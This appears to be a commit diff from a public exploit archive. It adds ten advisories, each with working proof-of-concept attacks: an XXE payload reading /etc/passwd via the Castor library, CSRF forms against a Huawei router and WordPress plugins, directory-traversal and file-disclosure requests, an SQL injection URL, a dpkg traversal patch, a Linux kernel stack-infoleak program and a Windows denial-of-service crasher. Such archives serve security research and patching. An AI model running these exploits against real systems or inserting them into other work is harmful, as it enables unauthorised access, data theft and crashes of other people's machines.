DB: 2016-01-11

10 new exploits

files.csv

@@ -35451,3 +35451,13 @@ id,file,description,date,author,platform,type,port
 39202,platforms/php/webapps/39202.txt,"WP Symposium Pro Social Network Plugin 15.12 - Multiple Vulnerabilities",2016-01-08,"Rahul Pratap Singh",php,webapps,0
 39203,platforms/lin_x86-64/shellcode/39203.c,"x86_64 Linux Egghunter - 18 bytes",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0
 39204,platforms/lin_x86/shellcode/39204.c,"Linux x86 - Egg-hunter (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
+39205,platforms/multiple/remote/39205.txt,"Castor Library XML External Entity Information Disclosure Vulnerability",2014-05-27,"Ron Gutierrez",multiple,remote,0
+39206,platforms/php/webapps/39206.txt,"webEdition CMS 'we_fs.php' SQL Injection Vulnerability",2014-05-28,"RedTeam Pentesting GmbH",php,webapps,0
+39207,platforms/linux/local/39207.txt,"dpkg Source Package Index: pseudo-header Processing Multiple Local Directory Traversal Vulnerability",2014-05-25,"Raphael Geissert",linux,local,0
+39208,platforms/windows/dos/39208.c,"Microsoft Windows Touch Injection API Local Denial of Service Vulnerability",2014-05-22,"Tavis Ormandy",windows,dos,0
+39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router Cross Site Request Forgery Vulnerability",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0
+39210,platforms/php/webapps/39210.txt,"Seo Panel 'file' Parameter Directory Traversal Vulnerability",2014-05-15,"Eric Sesterhenn",php,webapps,0
+39211,platforms/php/webapps/39211.txt,"WordPress Infocus Theme '/infocus/lib/scripts/dl-skin.php' Local File Disclosure Vulnerability",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0
+39212,platforms/php/webapps/39212.txt,"WordPress JW Player for Flash & HTML5 Video Plugin Cross Site Request Forgery Vulnerability",2014-06-10,"Tom Adams",php,webapps,0
+39213,platforms/php/webapps/39213.txt,"WordPress Featured Comments Plugin Cross Site Request Forgery Vulnerability",2014-06-10,"Tom Adams",php,webapps,0
+39214,platforms/linux/local/39214.c,"Linux Kernel <= 3.3.5 '/drivers/media/media-device.c' Local Information Disclosure Vulnerability",2014-05-28,"Salva Peiro",linux,local,0

platforms/hardware/remote/39209.txt

@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/67747/info
+
+Huawei E303 Router is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
+
+Huawei E303 Router running firmware versions CH2E303SM is vulnerable; other versions may also be affected. 
+
+[Proof -of-concept HTTP POST request]:
+POST /api/sms/send-sms HTTP/1.1
+Host: hi.link
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.8,de-de;q=0.5,de;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://hi.link/
+Connection: keep-alive
+Content-Type: text/plain
+Content-Length: 225
+
+<?xml version="1.0" 
+encoding="UTF-8"?><request><Index>-1</Index><Phones><Phone>4422</Phone></Phones><Sca></Sca><Content>
+Sample Text</Content><Length>0</Length><Reserved>1</Reserved><Date>2013-12-03 
+16:00:00</Date></request>

platforms/linux/local/39207.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/67727/info
+
+dpkg is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues will allow local attackers to modify files outside the destination directory and possibly gain access to the system.
+
+dpkg 1.3.0 is vulnerable; other versions may also be affected. 
+
+,--- exploit.patch ---
+Index: index/symlink/index-file
+@@ -0,0 +1,1 @@
++Escaped
+`--- 

platforms/linux/local/39214.c

@@ -0,0 +1,60 @@
+source: http://www.securityfocus.com/bid/68048/info
+
+The Linux kernel is prone to a local information-disclosure vulnerability.
+
+Local attackers can exploit this issue to cause a memory leak to obtain sensitive information that may lead to further attacks.
+
+Linux kernel 2.6.38 through 3.15-rc2 are vulnerable. 
+
+/*
+ * $File: media-enum-poc.c
+ * $Description: CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking 200 kstack bytes on x86_32.
+ * $Author: Salva Peiró <speirofr@gmail.com> (c) Copyright 2014.
+ * $URL: http://speirofr.appspot.com/files/media-enum-poc.c
+ * $License: GPLv2.
+ */
+
+#include <stdio.h>
+#include <fcntl.h>
+#include <string.h>
+#include <stdint.h>
+
+#include <sys/ioctl.h>
+#include <linux/media.h>
+#define MEDIA_DEV "/dev/media0"
+
+int main(int argc, char *argv[])
+{
+    struct media_entity_desc u_ent = {};
+    char *file = MEDIA_DEV;
+    int i, fd, ret;
+
+    if (argc > 1)
+        file = argv[1];
+    fd = open(file, O_RDONLY);
+    if (fd < 0){
+        perror("open " MEDIA_DEV);
+        return -1;
+    }
+
+    u_ent.id = 0 | MEDIA_ENT_ID_FLAG_NEXT;
+    ret=ioctl(fd, MEDIA_IOC_ENUM_ENTITIES, &u_ent);
+    if (ret < 0){
+        perror("ioctl " MEDIA_DEV);
+        return -1;
+    }
+
+    printf("[*] CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking %d kstack bytes:", sizeof(u_ent.reserved) + sizeof(u_ent.raw));
+    for (i = 0; i < 200/sizeof(uint32_t); i++) {
+        uint32_t data = *(uint32_t*)((uint32_t*)&u_ent.reserved+i);
+        if (i % 4 == 0)
+            printf("\n    %08d: ", i);
+        printf("0x%08x ", data);
+    }
+    printf("\n");
+
+    return ret;
+}
+
+/*
+ gcc -Wall -g -m32 media-enum-poc.c -o media-enum-poc # */

platforms/multiple/remote/39205.txt

@@ -0,0 +1,108 @@
+source: http://www.securityfocus.com/bid/67676/info
+
+Castor Library is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to gain access to sensitive information that may lead to further attacks.
+
+Caster Library 1.3.3-RC1 and earlier are vulnerable. 
+
+===========================================================
+Proof-of-Concept Code and Exploit
+===========================================================
+Now let’s look at how Castor handles unmarshalling calls to show how an
+application could be vulnerable:
+
+In this simple class, we create Person object:
+..snip..
+
+public class Person implements java.io.Serializable {
+
+/** The name of the person */
+   private String name = null;
+
+   /** The Date of birth */
+   private Date dob = null;
+
+   /** Creates a Person with no name */
+   public Person() {
+      super();
+   }
+
+   /** Creates a Person with the given name */
+   public Person(String name) { this.name = name; }
+
+..snip..
+
+Next, we generate a class that takes in external XML data to convert the
+XML document to a Person Object using the unmarshalling function:
+
+public static Person deserializePersonWithStatic(String xmlInput)
+{
+    StringReader xmlReader = new StringReader(xmlInput);
+
+    Person aPerson = null;
+     try
+      {
+          aPerson = (Person) Unmarshaller.unmarshal(Person.class,
+xmlReader);
+      }
+          catch (Exception e)
+      {
+          System.out.println("Failed to unmarshal the xml");
+          e.printStackTrace();
+    }
+
+          return aPerson;
+}
+
+
+If our application took in the XML data from a user controllable location
+and passed it through this unmarshalling function, the end user could use
+this functionality to view local resources on the application’s hosting
+server.  For example, look at the following Servlet that takes in XML data
+from the Request:
+
+public class GeneratePerson extends HttpServlet {
+
+     public void doPost(HttpServletRequest req, HttpServletResponse res)
+                              throws ServletException, IOException
+          {
+               String evilPersonXML = req.getParameter(“person”);
+
+          Person anotherPerson = deserializePersonWithStatic(evilPersonXML);
+
+          if(anotherPerson == null)
+          {
+                  System.out.println("No Person Object set");
+          }
+          else
+          {
+                  System.out.println("XXE Person name: " +
+anotherPerson.getName());
+          }
+
+What would happen if we passed the following string into the “person”
+request parameter value?:
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE doc [
+<!ENTITY x3 SYSTEM "file:///etc/passwd"> ]
+<person><name>&x3;</name></person>
+
+The output would be the following:
+XXE Person name: ##
+# User Database
+#
+# Note that this file is consulted directly only when the system is running
+# in single-user mode.  At other times this information is provided by
+# Open Directory.
+#
+# See the opendirectoryd(8) man page for additional information about
+# Open Directory.
+##
+nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
+root:*:0:0:System Administrator:/var/root:/bin/sh
+daemon:*:1:1:System Services:/var/root:/usr/bin/false
+..snip..
+
+As you can see, the unmarshalling function allowed external entities to be
+referenced and therefore the contents of the server’s /etc/passwd file was
+set within the “name” variable of the deserialized Person object.

platforms/php/webapps/39206.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/67689/info
+
+webEdition CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+webEdition CMS 6.3.3.0 through 6.3.8.0 svn6985 are vulnerable; other versions may also be affected. 
+
+ http://www.example.com/webEdition/we_fs.php?what=4[SQL] 

platforms/php/webapps/39210.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/67911/info
+
+Seo Panel is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. Information obtained could aid in further attacks.
+
+Seo Panel 3.4.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/seopanel/download.php?file=/etc/purple/prefs.xml 

platforms/php/webapps/39211.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/67934/info
+
+The Infocus theme for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
+
+Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. 
+
+<html>
+<body>
+<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">
+Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
+<input type="submit">
+</form>
+</body>
+</html>

platforms/php/webapps/39212.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/67954/info
+
+JW Player for Flash & HTML5 Video is a Plugin for WordPress is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
+
+JW Player for Flash & HTML5 Video 2.1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-admin/admin.php?page=jwp6_menu&player_id=1&action=delete 

platforms/php/webapps/39213.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/67955/info
+
+Featured Comments plugin for WordPress is prone to a cross-site request-forgery vulnerability.
+
+An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
+
+Featured Comments 1.2.1 is vulnerable; other versions may also be affected. 
+
+<form action=\"http://localhost/wp-admin/admin-ajax.php?action=feature_comments\"; method=\"POST\">
+  <input type=\"text\" name=\"do\" value=\"feature\">
+  <input type=\"text\" name=\"comment_id\" value=\"9\">
+  <input type=\"submit\">
+</form>

platforms/windows/dos/39208.c

@@ -0,0 +1,80 @@
+source: http://www.securityfocus.com/bid/67742/info
+
+Microsoft Windows is prone to a local denial-of-service vulnerability.
+
+A local attacker can exploit this issue to crash the affected computer, denying service to legitimate users. 
+
+#ifndef WIN32_NO_STATUS
+# define WIN32_NO_STATUS
+#endif
+#include <windows.h>
+#include <assert.h>
+#include <stdio.h>
+#include <winerror.h>
+#include <winternl.h>
+#include <stddef.h>
+#include <winnt.h>
+#ifdef WIN32_NO_STATUS
+# undef WIN32_NO_STATUS
+#endif
+#include <ntstatus.h>
+ 
+#pragma comment(lib, "ntdll")
+#pragma comment(lib, "user32")
+#pragma comment(lib, "gdi32")
+#pragma comment(lib, "advapi32")
+ 
+// InitializeTouchInjection() Win8.1 Testcase
+// -- Tavis Ormandy <taviso@google.com>, Feb 2014.
+ 
+int main(int argc, char **argv)
+{
+POINTER_TOUCH_INFO Contact;
+SID_AND_ATTRIBUTES SidToRestricted;
+ULONG Size;
+HANDLE Handle;
+ 
+ZeroMemory(&Contact, sizeof Contact);
+ZeroMemory(&SidToRestricted, sizeof SidToRestricted);
+ 
+// I *think* TOUCH_MASK_CONTACTAREA is required (i.e. rcContact), the rest
+// just need to be valid.
+Contact.pointerInfo.pointerType = PT_TOUCH;
+Contact.pointerInfo.pointerFlags = POINTER_FLAG_DOWN | POINTER_FLAG_INRANGE | POINTER_FLAG_INCONTACT;
+Contact.pointerInfo.ptPixelLocation.x = 'AAAA';
+Contact.pointerInfo.ptPixelLocation.y = 'AAAA';
+Contact.rcContact.left = 'AAAA';
+Contact.rcContact.right = 'AAAA';
+Contact.rcContact.top = 'AAAA';
+Contact.rcContact.bottom = 'AAAA';
+Contact.touchFlags = TOUCH_FLAG_NONE;
+Contact.touchMask = TOUCH_MASK_CONTACTAREA;
+Size = SECURITY_MAX_SID_SIZE;
+Handle = INVALID_HANDLE_VALUE;
+SidToRestricted.Sid = _alloca(Size);
+ 
+CreateWellKnownSid(WinNullSid, NULL, SidToRestricted.Sid, &Size);
+ 
+// This just exhausts available pool (how that's accomplished is irrelevant).
+for (Size = 1 << 26; Size; Size >>= 1) {
+while (CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
+;
+}
+ 
+for (;;) {
+// Initialize touch injection with very small number of contacts.
+InitializeTouchInjection(1, TOUCH_FEEDBACK_DEFAULT);
+ 
+// Now increase the number of contacts, which should (eventually) cause an allocation fail.
+InitializeTouchInjection(MAX_TOUCH_COUNT, TOUCH_FEEDBACK_DEFAULT);
+ 
+// I think this will just massage the pool, sequence found by fuzzing.
+OpenProcessToken(GetCurrentProcess(), MAXIMUM_ALLOWED, &Handle);
+CreateRestrictedToken(Handle, 0, 0, NULL, 0, NULL, 1, &SidToRestricted, &Handle);
+ 
+// Write something to the touch injection allocation.
+InjectTouchInput(1, &Contact);
+}
+ 
+return 0;
+}